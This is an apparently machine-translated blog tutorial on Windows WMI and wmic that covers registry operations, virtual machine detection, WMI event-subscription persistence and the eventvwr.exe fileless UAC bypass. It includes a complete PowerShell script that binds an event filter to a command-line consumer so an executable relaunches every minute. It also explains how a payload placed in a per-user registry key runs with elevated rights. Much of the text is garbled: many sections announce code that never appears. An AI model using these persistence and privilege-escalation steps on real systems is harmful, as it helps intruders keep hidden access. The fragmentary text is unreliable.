WMI Registry | WMI Persistence using wmic.exe
What is WMI?
WMI is the Microsoft implementation of Web-Based Enterprise Management (WBEM), with some enhancements in the initial version of it, WBEM is a industry initiative to develop a standard technology for accessing management information in an enterprise environment that covers not only Windows but also many other types of devices like routers, switches, storage arrays …etc. WMI uses the Common Information Model (CIM) industry standard to represent systems, applications, networks, devices, and other managed components. CIM is developed and maintained by the Distributed Management Task Force (DMTF).
All of that sounds pretty but when Microsoft developed the first versions of WMI they use DCOM (Distributed Component Object Model) wish if a proprietary Microsoft Technology, so the standards and cross compatibility just took a back seat at the time, on more recent versions of the operating system with Windows Management Framework 2.0 and above MS started to include more and more of the standards and shifter to using WS-Management SOAP-based protocol thru their WinRM (Windows Remote Management) protocol.
We can look at WMI as a collection of objects that provide access to different parts of the operating system, just like with PowerShell objects we have properties, methods and events for each. Each of these objects are defined by what is called MOF (Manage Object Format) files that are saved in %windir%\System32\wbem with the extension of .mof. The MOF files get loaded by what is called a Provider, when the Provider is registered he loads the definitions of the objects in to the current WMI Namespace. The Namespace can be seen a file system structure that organizes the objects on function, inside of each namespace the objects are just like in PowerShell in what is called Class Instances and each of this is populated with the OS and Application information as the system runs so we always have the latest information in this classes.
Namespaces are organize in a hierarchical way where \root is the top level for all other namespaces. The default namespace where most of the other namespaces and classes are located is root\CIMv2 on Windows Kernel 6.x on Kernel 5.x it is Default\CIMv2. Some are installed by default and others are only available when specific applications are installed.
In summary each Namespace contains Classes, these have:
- Methods Actions that can be taken.
- Properties Information that can be retrieved.
- Instances Instances of the class objects (services, Processes, Disks) each instance with Methods and Properties.
- Events are actions that WMI can monitor for and take action when they happen.
Collection data
Note:
Echo content formats are not aligned, you need to add parameters to specify the output format
According to powershell echoed branch display, you need to add the following parameters:
So, other calls by powershell wmi query methods are available wmic achieve, for example:
powershell command:
correspond
The output method to file:
Registry Operations
powershell code is as follows:
Wmic complete code is as follows:
Enum subkey
Note:
Method execution successful Does not mean that will be able to get the right returns the result to note here to fill in the correct parameters, shown in Figure 2-6, deliberately left out, “still prompt Method execution successful, but returns the result of an error
The key enumeration values specified:
Acquires character string data of a specified value:
Create a child:
Note:
Note permission issues here need administrator rights
String Value a named value:
Note: If a named value does not exist, then the new; if present, was modified
Delete subkey:
To delete a named set value:
Note:
The above parameters are described with reference to self https://msdn.microsoft.com/en-us/library/aa393664(VS.85).aspx
Special characters ^&H80000002 have the following meanings:
&H80000000 ‘HKEY_CLASSES_ROOT
&H80000001 ‘HKEY_CURRENT_USER
&H80000002 ‘HKEY_LOCAL_MACHINE
&H80000003 ‘HKEY_USERS
&H80000005 ‘HKEY_CURRENT_CONFIG
Virtual Machine Detection
View TotalPhysicalMemory and NumberOfLogicalProcessors
View the current process
WMI Persistence
Powershell complete codes are as follows:
$filterName = ‘BotFilter82’
$consumerName = ‘BotConsumer23’
$exePath = ‘C:\Windows\System32\notepad.exe’
$Query = “SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA ‘Win32_PerfFormattedData_PerfOS_System'”
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace “root\subscription” -Arguments @{Name=$filterName;EventNameSpace=”root\cimv2″;QueryLanguage=”WQL”;Query=$Query} -ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace “root\subscription” -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace “root\subscription” -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
The next steps through the corresponding process called wmic
Create an __EventFilter instance
Create an __EventConsumer instance
Create a __FilterToConsumerBinding instance
List the __EventFilter and __EventConsumer instances
Filters:
Event Consumers:
Event Bindings:
By viewing under powershell code:
Filters:
Event Consumers:
Event Bindings:
Remove all instances
Filters:
Event Consumers:
Event Bindings:
Note:
Binding in the determination wmic Filter parameter “BotFilter82” in “to become ‘
Clear through powershell implementation code:
Filters:
Event Consumers:
Event Bindings:
Fileless uac bypass using eventvwr exe and registry hijacking
Wmic part of the operation requires administrator privileges, and add here a newly acquired skills UACbypass
fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking
Reference:
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
Author:
Matt Nelson @enigma0x3
principle
When eventvwr.exe process starts, first looks for the registry position HKCU\Software\Classes\mscfile\shell\open\command, if there is empty, then look for registry location HKCR\mscfile\shell\open\command (where the default value %SystemRoot%\system32\mmc.exe "%1" %*), with high permission to start mmc.exe, and finally open eventvwr.msc.
Next, if the registry HKCU\Software\Classes\mscfile\shell\open\command added payload, you can execute a preset payload before you start mmc.exe
The most important thing:
Modify the registry HKCU\Software\Classes\mscfile\shell\open\command key values needed only normal user can privileges.
Reference
http://www.exploit-monday.com/2016/08/wmi-persistence-using-wmic.html
